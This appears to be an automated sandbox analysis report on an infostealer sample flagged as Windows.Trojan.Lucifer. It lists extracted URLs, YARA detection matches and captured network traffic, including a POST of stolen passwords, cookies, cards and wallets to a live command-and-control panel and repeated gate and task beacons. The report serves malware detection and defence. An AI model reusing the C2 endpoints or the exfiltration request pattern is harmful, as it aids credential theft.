                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 5VXh2VBmA0.exe, info.txt.0.drString found in binary or memory: https://gomorrah.pw
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=upda
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://support.google.com/chrome?p=update_error
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001313D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=update_errorFix
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/instal
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://support.google.com/installer/?product=
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001313D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131B6000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001314A000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
                    Source: unknownHTTP traffic detected: POST /logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dafd8eef66f49dHost: panel.cheater-zone.comContent-Length: 791547Expect: 100-continue
                    Source: unknownDNS traffic detected: queries for: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 5VXh2VBmA0.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR

                    System Summary

                    barindex
                    Source: 5VXh2VBmA0.exe, type: SAMPLEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 5VXh2VBmA0.exe, type: SAMPLEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 10.0.Zip.exe.176e4530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 0.2.5VXh2VBmA0.exe.2cb6f08.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 0000000A.00000000.306320250.00000176E4532000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe, type: DROPPEDMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                    Source: 5VXh2VBmA0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5VXh2VBmA0.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 5VXh2VBmA0.exe, type: SAMPLEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 10.0.Zip.exe.176e4530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 0.2.5VXh2VBmA0.exe.2cb6f08.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 0000000A.00000000.306320250.00000176E4532000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe, type: DROPPEDMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD3A2CF60_2_00007FFBAD3A2CF6
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD3935100_2_00007FFBAD393510
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD3934B00_2_00007FFBAD3934B0
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 0_2_00007FFBAD3941C00_2_00007FFBAD3941C0
